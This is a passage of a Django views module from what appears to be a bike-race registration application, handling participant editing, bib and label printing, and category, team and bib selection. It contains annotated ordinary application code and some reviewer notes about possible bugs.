	competition = get_object_or_404( Competition, pk=competitionId )
	license_holder = get_object_or_404( LicenseHolder, pk=licenseHolderId )

	participant = Participant.objects.filter( competition=competition, license_holder=license_holder, category__isnull=True ).first()
	if participant:
		return HttpResponseRedirect('{}ParticipantEdit/{}/'.format(getContext(request,'pop2Url'), participant.id))

	participant = Participant.objects.filter( competition=competition, license_holder=license_holder ).first()
	if participant:
		# Django idiom: clearing the pk and saving creates a copy of the row.
		participant.id = None
		participant.category = None
		participant.role = Participant.Competitor
		participant.bib = None
		participant.save()
		return HttpResponseRedirect('{}ParticipantEdit/{}/'.format(getContext(request,'pop2Url'), participant.id))

	return ParticipantAddToCompetition( request, competitionId, licenseHolderId )
@access_validation()
def ParticipantAddToCompetitionDifferentCategoryConfirm( request, competitionId, licenseHolderId ):
	'''Show the confirmation page before adding the license holder in another
	category; skip straight to edit if a category-less record already exists.
	Renders with locals(); local names are template context.
	'''
	competition = get_object_or_404( Competition, pk=competitionId )
	license_holder = get_object_or_404( LicenseHolder, pk=licenseHolderId )
	competition_age = competition.competition_age( license_holder )

	participant = Participant.objects.filter( competition=competition, license_holder=license_holder, category__isnull=True ).first()
	if participant:
		return HttpResponseRedirect('{}ParticipantEdit/{}/'.format(getContext(request,'pop2Url'), participant.id))

	return render( request, 'participant_add_to_category_confirm.html', locals() )
@access_validation()
def ParticipantEdit( request, participantId ):
	'''Main participant edit screen.

	Computes the status flags (age sanity, license-check, RFID tag state)
	shown by participant_form.html.  Renders with locals(); local names are
	template context.
	'''
	try:
		participant = Participant.objects.get( pk=participantId )
	except:
		# Participant was deleted (e.g. in another tab): bail out gracefully.
		return HttpResponseRedirect(getContext(request,'cancelUrl'))

	competition = participant.competition
	participant.enforce_tag_constraints()
	system_info = SystemInfo.get_singleton()
	add_multiple_categories = request.user.is_superuser or SystemInfo.get_singleton().reg_allow_add_multiple_categories
	competition_age = competition.competition_age( participant.license_holder )
	# Ages outside 5..95 are flagged as probable data-entry errors.
	is_suspicious_age = not (5 <= competition_age <= 95)

	is_license_checked = participant.is_license_checked()
	is_license_check_required = participant.is_license_check_required()
	# Superusers bypass the tag validation requirement.
	tag_ok = request.user.is_superuser or not competition.using_tags or not competition.do_tag_validation or participant.tag_checked
	#tag_ok = not competition.using_tags or not competition.do_tag_validation or participant.tag_checked

	isEdit = True
	rfid_antenna = int(request.session.get('rfid_antenna', 0))
	return render( request, 'participant_form.html', locals() )
@access_validation()
def ParticipantEditFromLicenseHolder( request, competitionId, licenseHolderId ):
	'''Open the participant edit screen for a license holder, creating the
	participant record first if the license holder is not yet entered.'''
	competition = get_object_or_404( Competition, pk=competitionId )
	license_holder = get_object_or_404( LicenseHolder, pk=licenseHolderId )
	participant = Participant.objects.filter(competition=competition, license_holder=license_holder).first()
	if not participant:
		return ParticipantAddToCompetition( request, competitionId, licenseHolderId )
	participant.enforce_tag_constraints()
	return ParticipantEdit( request, participant.id )
@access_validation()
def ParticipantRemove( request, participantId ):
	'''Show the participant form in "remove" mode (isEdit=False) so the user
	can confirm deletion.  Renders with locals(); local names are template context.
	'''
	participant = get_participant( participantId )
	participant.enforce_tag_constraints()
	add_multiple_categories = request.user.is_superuser or SystemInfo.get_singleton().reg_allow_add_multiple_categories
	competition_age = participant.competition.competition_age( participant.license_holder )
	# NOTE(review): this uses 8..90 as the plausible age range while
	# ParticipantEdit uses 5..95 - confirm whether the difference is intended.
	is_suspicious_age = not (8 <= competition_age <= 90)
	isEdit = False
	return render( request, 'participant_form.html', locals() )
@access_validation()
def ParticipantDoDelete( request, participantId ):
	'''Permanently delete the participant record, then return to the caller's page.'''
	get_participant( participantId ).delete()
	return HttpResponseRedirect( getContext(request,'cancelUrl') )
def get_temp_print_filename( request, bib, ftype ):
	'''Build a unique temporary pdf path under <app_root>/pdfs.

	The basename encodes bib, server port, rfid antenna and print type as
	"key-value" fields joined by "_", followed by a random uuid hex suffix,
	e.g. "bib-17_port-8000_antenna-3_type-Body_<hex>.pdf".
	'''
	port = request.META['SERVER_PORT']
	rfid_antenna = int(request.session.get('rfid_antenna',0))
	fields = ( ('bib',bib), ('port',port), ('antenna',rfid_antenna), ('type',ftype) )
	encoded = '_'.join( '{}-{}'.format(attr, value) for attr, value in fields )
	pdf_dir = os.path.join( os.path.dirname(os.path.dirname(os.path.realpath(__file__))), 'pdfs' )
	return os.path.join( pdf_dir, '{}_{}'.format(encoded, uuid.uuid4().hex) ) + '.pdf'
def get_cmd( cmd ):
	'''Expand the leading "$gswin" placeholder to the detected Ghostscript
	executable; any other command string is returned unchanged.'''
	if not cmd.strip().startswith('$gswin'):
		return cmd
	# Replace only the first occurrence; fall back to a sentinel if Ghostscript
	# was not found so the failure is visible in the command output.
	return cmd.replace('$gswin', gs_cmd() or 'gs_not_found', 1)
def print_pdf( request, participant, pdf_str, print_type ):
	'''Deliver a generated pdf according to the system print configuration.

	SERVER_PRINT_TAG: write the pdf to a temp file, run the configured print
	command on it, and render a status page.  CLIENT_PRINT_TAG: stream the pdf
	inline to the browser.  Otherwise: no-op redirect back.
	'''
	system_info = SystemInfo.get_singleton()
	if system_info.print_tag_option == SystemInfo.SERVER_PRINT_TAG:
		try:
			tmp_file = get_temp_print_filename( request, participant.bib, print_type )

			with open(tmp_file, 'wb') as f:
				f.write( pdf_str )

			# '$1' in the configured command is substituted with the temp file path.
			p = Popen(
				get_cmd(system_info.server_print_tag_cmd).replace('$1', tmp_file), shell=True, bufsize=-1,
				stdin=PIPE, stdout=PIPE, stderr=PIPE,
			)
			# The pdf is also piped to stdin for commands that read it there.
			stdout_info, stderr_info = p.communicate( pdf_str )
			returncode = p.returncode
		except Exception as e:
			# NOTE(review): on failure stderr_info holds the exception object
			# (not text); the template presumably stringifies it.
			stdout_info, stderr_info = '', e
			returncode = None

		# Best-effort cleanup of the temp file (it may not exist if the write failed).
		try:
			os.remove( tmp_file )
		except:
			pass

		title = _("Print Status")
		return render( request, 'cmd_response.html', locals() )
	elif system_info.print_tag_option == SystemInfo.CLIENT_PRINT_TAG:
		response = HttpResponse(pdf_str, content_type="application/pdf")
		response['Content-Disposition'] = 'inline'
		return response
	else:
		return HttpResponseRedirect( getContext(request,'cancelUrl') )
@access_validation()
def ParticipantPrintBodyBib( request, participantId, copies=2, onePage=False ):
	'''Generate and deliver the participant's body bib pdf (copies per sheet).'''
	participant = get_participant( participantId )
	return print_pdf( request, participant, print_body_bib(participant, copies, onePage), 'Body' )
@access_validation()
def ParticipantPrintBibLabels( request, participantId ):
	'''Generate and deliver the bib/frame tag labels pdf (both pages).'''
	participant = get_participant( participantId )
	return print_pdf( request, participant, print_bib_tag_label(participant), 'Frame' )
@access_validation()
def ParticipantPrintBibLabel1( request, participantId ):
	'''Generate and deliver a single (left page only) bib/frame tag label pdf.'''
	participant = get_participant( participantId )
	return print_pdf( request, participant, print_bib_tag_label(participant, right_page=False), 'Frame' )
@access_validation()
def ParticipantPrintShoulderBib( request, participantId ):
	'''Generate and deliver the participant's shoulder bib pdf.'''
	participant = get_participant( participantId )
	return print_pdf( request, participant, print_shoulder_bib(participant), 'Shoulder' )
@access_validation()
def ParticipantPrintAllBib( request, participantId ):
	'''Print every bib artifact enabled on the competition, returning the
	response of the *last* print performed.

	NOTE(review): if no print option is enabled on the competition this
	returns None, which Django rejects as a view response - confirm whether
	at least one option is guaranteed elsewhere.
	'''
	participant = get_participant( participantId )
	c = participant.competition
	ret = None
	# Label-printed body bibs: two copies, or one if only bib_label_print is set.
	if c.bibs_label_print:
		ret = ParticipantPrintBodyBib( request, participantId, 2 )
	elif c.bib_label_print:
		ret = ParticipantPrintBodyBib( request, participantId, 1 )
	# Laser-printed body bibs: two copies on one page.
	if c.bibs_laser_print:
		ret = ParticipantPrintBodyBib( request, participantId, 2, 1 )
	if c.shoulders_label_print:
		ret = ParticipantPrintShoulderBib( request, participantId )
	# Frame labels: both pages, or the single-label variant.
	if c.frame_label_print:
		ret = ParticipantPrintBibLabels( request, participantId )
	elif c.frame_label_print_1:
		ret = ParticipantPrintBibLabel1( request, participantId )
	return ret
@access_validation()
def ParticipantPrintEmergencyContactInfo( request, participantId ):
	'''Generate and deliver the participant's emergency contact id label pdf.'''
	participant = get_participant( participantId )
	return print_pdf( request, participant, print_id_label(participant), 'Emergency' )
def ParticipantEmergencyContactInfo( request, participantId ):
	'''Show the emergency contact page, including the participant's team mates
	split into three groups: non-competitor team members at this competition,
	competitor team members at this competition, and team members known from
	other competitions.  Renders with locals(); local names are template context.

	NOTE(review): unlike the sibling views this one has no @access_validation()
	decorator - confirm whether that is intentional (e.g. for emergency access).
	'''
	participant = get_participant( participantId )
	license_holder = participant.license_holder
	competition = participant.competition

	team_members = None
	if participant.team:
		# Staff/officials of the same team registered at this competition.
		team_members_non_competitors_at_competition = LicenseHolder.objects.filter(
			pk__in=Participant.objects.filter(competition=competition,team=participant.team).exclude(
				license_holder=license_holder).exclude(
				role=Participant.Competitor).values_list('license_holder',flat=True).distinct()
		)
		# Fellow competitors of the same team at this competition.
		team_members_at_competition = LicenseHolder.objects.filter(
			pk__in=Participant.objects.filter(competition=competition,team=participant.team,role=Participant.Competitor).exclude(
				license_holder=license_holder).values_list('license_holder',flat=True).distinct()
		)
		# Team members seen at other competitions only.
		team_members_other = LicenseHolder.objects.filter(
			pk__in=Participant.objects.filter(
				team=participant.team).exclude(
				competition=competition).exclude(
				license_holder=license_holder).exclude(
				license_holder__in=team_members_at_competition).exclude(
				license_holder__in=team_members_non_competitors_at_competition).values_list('license_holder',flat=True).distinct()
		)
	else:
		team_members_non_competitors_at_competition = LicenseHolder.objects.none()
		team_members_at_competition = LicenseHolder.objects.none()
		team_members_other = LicenseHolder.objects.none()

	return render( request, 'participant_emergency_info.html', locals() )
@autostrip
class ParticipantCategorySelectForm( Form ):
	'''Gender filter form for the category-selection screen.

	Gender encoding matches LicenseHolder.gender: 0 = Men, 1 = Women,
	2 = Open only, -1 = no filter.
	'''
	gender = forms.ChoiceField( choices = (
			(-1, _('All')),
			(0, _('Men / Open')),
			(1, _('Women / Open')),
			(2, _('Open')),
		),
		initial = -1 )

	def __init__(self, *args, **kwargs):
		super(ParticipantCategorySelectForm, self).__init__(*args, **kwargs)

		self.helper = FormHelper( self )
		self.helper.form_action = '.'
		self.helper.form_class = 'navbar-form navbar-left'

		button_args = [
			Submit( 'search-submit', _('Search'), css_class = 'btn btn-primary' ),
			CancelButton(),
		]

		# Inline layout: label, gender dropdown, then the two buttons.
		self.helper.layout = Layout(
			HTML( u'{}:&nbsp;&nbsp;&nbsp;&nbsp;'.format( _("Search") ) ),
			Div( Field('gender', css_class = 'form-control'), css_class = 'form-group' ),
			HTML( u'&nbsp;&nbsp;&nbsp;&nbsp;' ),
			button_args[0],
			button_args[1],
		)
@access_validation()
def ParticipantCategoryChange( request, participantId ):
	'''Show the category-selection screen for a participant, filtered by gender.

	GET initializes the gender filter from the license holder; POST applies the
	submitted filter.  Renders with locals(), so local variable names are part
	of the template context and must not be renamed.
	'''
	participant = get_participant( participantId )
	competition = participant.competition
	license_holder = participant.license_holder
	competition_age = competition.competition_age( license_holder )

	gender = None
	if request.method == 'POST':
		form = ParticipantCategorySelectForm( request.POST )
		if form.is_valid():
			gender = int(form.cleaned_data['gender'])
	else:
		gender = license_holder.gender
		form = ParticipantCategorySelectForm( initial = dict(gender=gender) )

	categories = Category.objects.filter( format=competition.category_format )
	# IDIOM FIX: identity test against None (was "gender == None").
	# gender stays None here only when the POSTed form failed validation.
	if gender is None:
		gender = license_holder.gender
	if gender != -1:
		# Match the selected gender plus Open (gender == 2) categories.
		categories = categories.filter( Q(gender=2) | Q(gender=gender) )
	available_categories = set( competition.get_available_categories(license_holder, gender=gender, participant_exclude=participant) )

	# Categories that have bib number ranges assigned in this competition.
	categories_with_numbers = set()
	for cn in CategoryNumbers.objects.filter( competition=competition ):
		if cn.get_numbers():
			categories_with_numbers |= set( cn.categories.all() )

	return render( request, 'participant_category_select.html', locals() )
@access_validation()
def ParticipantCategorySelect( request, participantId, categoryId ):
	'''Assign the chosen category (categoryId 0 clears it) to the participant,
	validating against duplicate-category and event-conflict constraints.
	Error paths render participant_integrity_error.html with locals().
	'''
	participant = get_participant( participantId )
	competition = participant.competition
	# categoryId == 0 means "no category".
	category = get_object_or_404( Category, pk=categoryId ) if int(categoryId) else None

	category_changed = (participant.category != category)
	if category and category_changed:
		# All categories this license holder currently occupies in the competition.
		categories = set( p.category
			for p in Participant.objects.filter(
				competition=competition, license_holder=participant.license_holder).exclude(
				category__isnull=True).select_related('category')
		)
		if category in categories:
			has_error, conflict_explanation, conflict_participant = True, _('LicenseHolder is already participating in this Category.'), None
			return render( request, 'participant_integrity_error.html', locals() )

		# Simulate the change, then check that no event would contain two of
		# this license holder's categories.
		categories.discard( participant.category )
		categories.add( category )
		is_category_conflict, category_conflict_event, category_conflict_categories = competition.is_category_conflict(categories)
		if is_category_conflict:
			has_error, conflict_explanation, conflict_participant = True, _('Cannot assign to another Category that already exists in an Event.'), None
			categories = sorted(categories, key=lambda c: c.sequence)
			category_conflict_categories = sorted(category_conflict_categories, key=lambda c: c.sequence)
			return render( request, 'participant_integrity_error.html', locals() )

	participant.category = category
	# Assigning a category implies the Competitor role.
	if category and participant.role != Participant.Competitor:
		participant.role = Participant.Competitor

	participant.update_bib_new_category()

	# A category change invalidates any previous license check.
	if category_changed:
		participant.license_checked = False

	try:
		participant.auto_confirm().save()
	except IntegrityError:
		has_error, conflict_explanation, conflict_participant = participant.explain_integrity_error()
		return render( request, 'participant_integrity_error.html', locals() )

	if category_changed:
		participant.add_to_default_optional_events()
	return HttpResponseRedirect(getContext(request,'pop2Url'))
#-----------------------------------------------------------------------
@access_validation()
def ParticipantRoleChange( request, participantId ):
	# Present the role-selection page; the actual change is applied by ParticipantRoleSelect.
	participant = get_participant( participantId )
	return render( request, 'participant_role_select.html', locals() )
@access_validation()
def ParticipantRoleSelect( request, participantId, role ):
	"""Set the participant's role.  Competitors get default values; all other
	roles have bib and category cleared (and team too, for roles >= 200)."""
	participant = get_participant( participantId )
	participant.role = int(role)
	if participant.role == Participant.Competitor:
		participant.init_default_values()
	else:
		participant.bib = None
		participant.category = None
		# Non-team roles (officials, etc.) must not carry a team.
		if participant.role >= 200:
			participant.team = None
	participant.auto_confirm().save()
	return HttpResponseRedirect(getContext(request,'pop2Url'))
#-----------------------------------------------------------------------
@access_validation()
def ParticipantLicenseCheckChange( request, participantId ):
	# Show the license-check page, including any per-category note configured
	# for this competition (blank if none configured).
	participant = get_participant( participantId )
	cco = CompetitionCategoryOption.objects.filter( competition=participant.competition, category=participant.category ).first()
	note = cco.note if cco else u''
	return render( request, 'participant_license_check_select.html', locals() )
@access_validation()
def ParticipantLicenseCheckSelect( request, participantId, status ):
	"""Record the license-check result for the participant ("0" = unchecked, non-zero = checked)."""
	participant = get_participant( participantId )
	checked = (int(status) != 0)
	participant.license_checked = checked
	if not checked:
		# Also clear the persistent per-season license-check state for this rider.
		LicenseCheckState.uncheck_participant( participant )
	participant.auto_confirm().save()
	return HttpResponseRedirect(getContext(request,'pop2Url'))
#-----------------------------------------------------------------------
@access_validation()
def ParticipantBooleanChange( request, participantId, field ):
	"""Toggle the named boolean attribute on the participant and return to the previous page."""
	participant = get_participant( participantId )
	current = getattr( participant, field )
	setattr( participant, field, not current )
	# Toggling 'confirmed' itself must not trigger auto-confirmation.
	if field != 'confirmed':
		participant.auto_confirm()
	participant.save()
	return HttpResponseRedirect(getContext(request,'cancelUrl'))
#-----------------------------------------------------------------------
@access_validation()
def ParticipantTeamChange( request, participantId ):
	# Team search/selection page.  The search text is remembered in the session
	# so the filter persists across visits.
	participant = get_participant( participantId )
	search_text = request.session.get('teams_filter', '')
	btns = [('new-submit', _('New Team'), 'btn btn-success')]
	if request.method == 'POST':
		if 'cancel-submit' in request.POST:
			return HttpResponseRedirect(getContext(request,'cancelUrl'))
		if 'new-submit' in request.POST:
			return HttpResponseRedirect( pushUrl(request,'TeamNew') )
		form = SearchForm( btns, request.POST )
		if form.is_valid():
			search_text = form.cleaned_data['search_text']
			request.session['teams_filter'] = search_text
	else:
		form = SearchForm( btns, initial = {'search_text': search_text} )
	search_text = utils.normalizeSearch(search_text)
	# Every whitespace-separated term must match somewhere in the team's search text;
	# only active teams are offered, capped at MaxReturn results.
	q = Q( active=True )
	for n in search_text.split():
		q &= Q( search_text__contains = n )
	teams = Team.objects.filter(q)[:MaxReturn]
	return render( request, 'participant_team_select.html', locals() )
@access_validation()
def ParticipantTeamSelect( request, participantId, teamId ):
	"""Validate the participant/team pair, then hand off to the per-discipline
	team-selection screen.

	teamId == 0 means "no team"; a non-zero teamId must reference an existing
	Team (404 otherwise).  The actual team assignment is performed in
	ParticipantTeamSelectDiscipline.  (An unreachable ``if False:`` branch that
	assigned the team directly was removed.)
	"""
	get_participant( participantId )			# 404 if the participant does not exist.
	if int(teamId):
		get_object_or_404( Team, pk=teamId )	# 404 if the team does not exist.
	return HttpResponseRedirect(getContext(request,'popUrl') + 'ParticipantTeamSelectDiscipline/{}/{}/'.format(participantId,teamId))
def get_ioc_countries():
	"""Return (name, code) pairs for all IOC countries, sorted by IOC code."""
	pairs = [(name, code) for code, name in ioc_country.items()]
	return sorted( pairs, key=operator.itemgetter(1) )
@access_validation()
def LicenseHolderNationCodeSelect( request, licenseHolderId, iocI ):
	"""Set the license holder's nation code from the country grid (iocI < 0 clears it)."""
	license_holder = get_object_or_404( LicenseHolder, pk=licenseHolderId )
	i = int(iocI)
	# A negative index means "no nation"; otherwise take the IOC code of the i-th country.
	license_holder.nation_code = u'' if i < 0 else get_ioc_countries()[i][-1]
	license_holder.save()
	return HttpResponseRedirect(getContext(request,'popUrl'))
@access_validation()
def LicenseHolderNationCodeChange( request, licenseHolderId ):
	# Render the nation-code picker: a grid of [index, flag, name, code] rows,
	# 4 countries per row, with the holder's current nation highlighted.
	license_holder = get_object_or_404( LicenseHolder, pk=licenseHolderId )
	countries = [[i, flag_html(c[-1])] + list(c) for i, c in enumerate(get_ioc_countries())]
	flag_instance = u''
	code_instance = u''
	name_instance = u''
	# NOTE(review): the loop below assigns ioc_instance, but only code_instance is
	# initialized above - confirm which name the template actually reads; if it is
	# code_instance, the current code never fills it in.
	for c in countries:
		if c[-1] == license_holder.nation_code:
			flag_instance = c[1]
			ioc_instance = c[-1]
			name_instance = c[-2]
			break
	rows = []
	cols = 4
	for i in range(0, len(countries), cols):
		rows.append( countries[i:i+cols] )
	return render( request, 'license_holder_nation_code_select.html', locals() )
@autostrip
class TeamDisciplineForm( Form ):
	# Checkbox list of disciplines used when assigning a team: the operator can
	# apply the team to all disciplines or only to the checked ones.
	disciplines = forms.MultipleChoiceField(required=False, widget=forms.CheckboxSelectMultiple,)
	def __init__(self, *args, **kwargs):
		super(TeamDisciplineForm, self).__init__(*args, **kwargs)
		# Choices are computed at instantiation time so newly added Disciplines are picked up.
		self.fields['disciplines'].choices = [(d.id, d.name) for d in Discipline.objects.all()]
		self.helper = FormHelper( self )
		self.helper.form_action = '.'
		self.helper.form_class = ''
		buttons = [
			Submit( 'set-all-submit', _('Same Team for All Disciplines'), css_class = 'btn btn-primary' ),
			Submit( 'set-selected-submit', _('Team for Selected Disciplines Only'), css_class = 'btn btn-primary' ),
			CancelButton(),
		]
		self.helper.layout = Layout(
			Row( buttons[0], HTML(' '*8), buttons[2] ),
			Field('disciplines'),
			Row( buttons[1] ),
		)
@access_validation()
def ParticipantTeamSelectDiscipline( request, participantId, teamId ):
	"""Assign (or clear) the participant's team, and record TeamHints for the
	chosen disciplines.

	teamId == 0 clears the team.  A TeamHint remembers the rider's team per
	discipline so future competitions default to the same team; clearing the
	team deletes the corresponding hints.
	"""
	participant = get_participant( participantId )
	competition = participant.competition
	if int(teamId):
		team = get_object_or_404( Team, pk=teamId )
	else:
		team = None
	if request.method == 'POST':
		disciplines = []
		if 'set-all-submit' in request.POST:
			disciplines = list( Discipline.objects.all().values_list('id', flat=True) )
		elif 'set-selected-submit' in request.POST:
			form = TeamDisciplineForm( request.POST )
			if form.is_valid():
				disciplines = form.cleaned_data['disciplines']
		participant.team = team
		participant.auto_confirm().save()
		today = timezone.localtime(timezone.now()).date()
		for discipline_id in disciplines:	# renamed from "id" to avoid shadowing the builtin.
			if team:
				try:
					th = TeamHint.objects.get( discipline__id=discipline_id, license_holder=participant.license_holder )
					if th.team_id == team.id:
						continue	# Hint already points at this team - nothing to update.
					th.team = team
				except TeamHint.DoesNotExist:
					th = TeamHint( license_holder=participant.license_holder, team=team )
				th.discipline_id = discipline_id
				th.effective_date = today
				th.save()
			else:
				# No team: remove any hint for this discipline.
				TeamHint.objects.filter( discipline__id=discipline_id, license_holder=participant.license_holder ).delete()
		return HttpResponseRedirect(getContext(request,'pop2Url'))
	else:
		form = TeamDisciplineForm( initial = {'disciplines': [competition.discipline_id]} )
	return render( request, 'participant_team_select_discipline.html', locals() )
#-----------------------------------------------------------------------
class Bib( object ):
	"""Row for the bib-selection table: a number plus its current owner, if any."""
	def __init__( self, bib, license_holder = None, date_lost=None ):
		self.bib = bib
		self.license_holder = license_holder
		self.date_lost = date_lost
		# Show the holder's name when the bib is already allocated, otherwise blank.
		self.full_name = u'' if not license_holder else license_holder.full_name()
@access_validation()
def ParticipantBibChange( request, participantId ):
	"""Show the bib-number selection page for the participant's category.

	Builds one Bib row per available number, annotated with the name of any
	rider currently holding that number and its lost date (if recorded).
	"""
	participant = get_participant( participantId )
	if not participant.category:
		# A bib can only be chosen once a category is assigned.
		return HttpResponseRedirect(getContext(request,'cancelUrl'))
	competition = participant.competition
	category = participant.category
	number_set = competition.number_set
	available_numbers, allocated_numbers, lost_bibs, category_numbers_defined = participant.get_available_numbers()
	bibs = [Bib(n, allocated_numbers.get(n, None), lost_bibs.get(n,None)) for n in available_numbers]
	# Drop the potentially large intermediates so they are not passed to the template.
	del available_numbers
	del allocated_numbers
	del lost_bibs
	if bibs and participant.category:
		participants = Participant.objects.filter(competition=competition, category=participant.category).exclude(bib__isnull=True)
		bib_participants = { p.bib:p for p in participants }
		for b in bibs:
			try:
				b.full_name = bib_participants[b.bib].full_name_team
			except KeyError:	# was a bare except: only a missing bib is expected here.
				pass
	has_existing_number_set_bib = (
		number_set and
		participant.bib == number_set.get_bib( competition, participant.license_holder, participant.category )
	)
	return render( request, 'participant_bib_select.html', locals() )
@access_validation()
def ParticipantBibSelect( request, participantId, bib ):
	# Apply the chosen bib number (bib < 0 means "no bib").  When the competition
	# uses a number set and an old number is released, that number is recorded
	# as lost via set_lost().
	participant = get_participant( participantId )
	competition = participant.competition
	def done():
		return HttpResponseRedirect(getContext(request,'pop2Url'))
	def showSelectAgain():
		return HttpResponseRedirect(getContext(request,'popUrl'))
	bib_save = participant.bib
	bib = int(bib)
	# No change - nothing to do.
	if bib == bib_save:
		return done()
	# set_lost is a no-op unless a number set exists and a previous bib is being released.
	if competition.number_set and bib_save is not None:
		def set_lost():
			competition.number_set.set_lost( bib_save, participant.license_holder )
	else:
		def set_lost():
			pass
	# Bib assigned "No Bib".
	if bib < 0:
		participant.bib = None
		set_lost()
		return done()
	# Assign new Bib.
	participant.bib = bib
	# Check for conflict in events.
	if participant.category:
		bib_conflicts = participant.get_bib_conflicts()
		if bib_conflicts:
			# If conflict, restore the previous bib and repeat.
			participant.bib = bib_save
			return showSelectAgain()
	set_lost()
	try:
		participant.auto_confirm().save()
	except IntegrityError as e:
		# Assume the Integrity Error is due to a race condition with the bib number.
		return showSelectAgain()
	return done()
#-----------------------------------------------------------------------
@autostrip
class ParticipantNoteForm( Form ):
	# One-textarea form used for editing both the participant note and the
	# license holder's general note.
	note = forms.CharField( widget = forms.Textarea, required = False, label = _('Note') )
	def __init__(self, *args, **kwargs):
		super(ParticipantNoteForm, self).__init__(*args, **kwargs)
		self.helper = FormHelper( self )
		self.helper.form_action = '.'
		self.helper.form_class = 'navbar-form navbar-left'
		button_args = [
			Submit( 'ok-submit', _('OK'), css_class = 'btn btn-primary' ),
			CancelButton(),
		]
		self.helper.layout = Layout(
			Row(
				Field('note', css_class = 'form-control', cols = '60'),
			),
			Row(
				button_args[0],
				button_args[1],
			)
		)
@access_validation()
def ParticipantNoteChange( request, participantId ):
	# Edit the note attached to this participant (competition-specific; compare
	# ParticipantGeneralNoteChange which edits the license holder's note).
	participant = get_participant( participantId )
	competition = participant.competition
	license_holder = participant.license_holder
	if request.method == 'POST':
		form = ParticipantNoteForm( request.POST )
		if form.is_valid():
			note = form.cleaned_data['note']
			participant.note = note
			participant.auto_confirm().save()
		return HttpResponseRedirect(getContext(request,'cancelUrl'))
	else:
		form = ParticipantNoteForm( initial = dict(note = participant.note) )
	return render( request, 'participant_note_change.html', locals() )
@access_validation()
def ParticipantGeneralNoteChange( request, participantId ):
	# Edit the general note stored on the license holder (visible across
	# competitions, unlike the per-participant note).
	participant = get_participant( participantId )
	competition = participant.competition
	license_holder = participant.license_holder
	if request.method == 'POST':
		form = ParticipantNoteForm( request.POST )
		if form.is_valid():
			note = form.cleaned_data['note']
			license_holder.note = note
			license_holder.save()
		return HttpResponseRedirect(getContext(request,'cancelUrl'))
	else:
		form = ParticipantNoteForm( initial = dict(note = license_holder.note) )
	return render( request, 'participant_note_change.html', locals() )
#-----------------------------------------------------------------------
def GetParticipantOptionForm( participation_optional_events ):
	# Factory: build a form class whose 'options' choices are the competition's
	# optional events for this participant.
	choices = [(event.option_id, u'{} ({})'.format(event.name, event.get_event_type_display()))
				for event, is_participating in participation_optional_events]
	@autostrip
	class ParticipantOptionForm( Form ):
		options = forms.MultipleChoiceField( required = False, label = _('Optional Events'), choices=choices )
		def __init__(self, *args, **kwargs):
			super(ParticipantOptionForm, self).__init__(*args, **kwargs)
			self.helper = FormHelper( self )
			self.helper.form_action = '.'
			self.helper.form_class = 'navbar-form navbar-left'
			button_args = [
				Submit( 'ok-submit', _('OK'), css_class = 'btn btn-primary' ),
				CancelButton(),
			]
			self.helper.layout = Layout(
				Row(
					Field('options', css_class = 'form-control', size = '20'),
				),
				Row(
					button_args[0],
					button_args[1],
				)
			)
	return ParticipantOptionForm
@access_validation()
def ParticipantOptionChange( request, participantId ):
	# Choose which of the competition's optional events the participant enters.
	participant = get_participant( participantId )
	competition = participant.competition
	license_holder = participant.license_holder
	participation_events = participant.get_participant_events()
	# Keep only the optional events; each entry is (event, is_participating).
	participation_optional_events = [(event, is_participating) for event, optional, is_participating in participation_events if optional]
	if request.method == 'POST':
		form = GetParticipantOptionForm( participation_optional_events )( request.POST )
		if form.is_valid():
			options = form.cleaned_data['options']
			ParticipantOption.set_option_ids( participant, options )
		return HttpResponseRedirect(getContext(request,'cancelUrl'))
	else:
		form = GetParticipantOptionForm( participation_optional_events )(
			initial = dict(options = [event.option_id for event, is_participating in participation_optional_events if is_participating])
		)
	return render( request, 'participant_option_change.html', locals() )
#-----------------------------------------------------------------------
def GetParticipantEstSpeedForm( participant ):
	# Factory: build an estimated-speed form customized to the participant's
	# competition.  The est_duration field only exists when a time-trial
	# distance (km) is known for the participant.
	competition = participant.competition
	km = participant.get_tt_km()
	@autostrip
	class ParticipantEstSpeedForm( Form ):
		est_speed = forms.FloatField( required = False,
			label=format_lazy(u'{} ({})', _('Estimated Speed for Time Trial'), competition.speed_unit_display),
			help_text=_('Enter a value or choose from the grid below.')
		)
		if km:
			est_duration = DurationField.DurationFormField( required = False,
				label=format_lazy(u'{} ({})', _('or Estimated Time for Time Trial'), participant.get_tt_distance_text() ),
				help_text=_('In [HH:]MM:SS format.')
			)
		seed_option = forms.ChoiceField( required = False, choices=Participant.SEED_OPTION_CHOICES, label=_('Seed Option'),
			help_text=_('Tells RaceDB to start this rider as Early or as Late as possible in the Start Wave')
		)
		def __init__(self, *args, **kwargs):
			super(ParticipantEstSpeedForm, self).__init__(*args, **kwargs)
			self.helper = FormHelper( self )
			self.helper.form_action = '.'
			self.helper.form_class = 'navbar-form navbar-left'
			button_args = [
				Submit( 'ok-submit', _('OK'), css_class = 'btn btn-primary' ),
				CancelButton(),
			]
			self.helper.layout = Layout(
				Row(
					Col(Field('est_speed', css_class = 'form-control', size = '20'), 4),
					Col(Field('est_duration'), 4) if km else HTML(''),
					Col(Field('seed_option'), 4),
				),
				Row(
					button_args[0],
					button_args[1],
				)
			)
	return ParticipantEstSpeedForm
@access_validation()
def ParticipantEstSpeedChange( request, participantId ):
	# Edit the time-trial estimated speed and seed option.  Speeds are stored
	# in km/h and converted to/from the competition's display unit.
	participant = get_participant( participantId )
	competition = participant.competition
	license_holder = participant.license_holder
	if request.method == 'POST':
		form = GetParticipantEstSpeedForm(participant)( request.POST )
		if form.is_valid():
			est_speed = form.cleaned_data['est_speed']
			participant.est_kmh = competition.to_kmh( est_speed or 0.0 )
			participant.seed_option = form.cleaned_data['seed_option']
			participant.save()
		return HttpResponseRedirect(getContext(request,'cancelUrl'))
	else:
		form = GetParticipantEstSpeedForm(participant)(
			initial = dict( est_speed=competition.to_local_speed(participant.est_kmh), seed_option=participant.seed_option )
		)
	# Build a pick-grid of speeds: one integer speed per grid row, one decimal
	# digit per grid column (20-50 km/h or 12-31 mph).
	# NOTE(review): keys are written as (col, row) but read back as (row, col);
	# the ranges happen to line up so the table is correct, just confusingly named.
	speed_rc = {}
	if competition.distance_unit == 0:
		for col, kmh in enumerate(range(20, 51)):
			for row, decimal in enumerate(range(0, 10)):
				speed_rc[(col, row)] = u'{}.{:01d}'.format(kmh, decimal)
	else:
		for col, mph in enumerate(range(12, 32)):
			for row, decimal in enumerate(range(0, 10)):
				speed_rc[(col, row)] = u'{}.{:01d}'.format(mph, decimal)
	row_max = max( row for row, col in speed_rc.keys() ) + 1
	col_max = max( col for row, col in speed_rc.keys() ) + 1
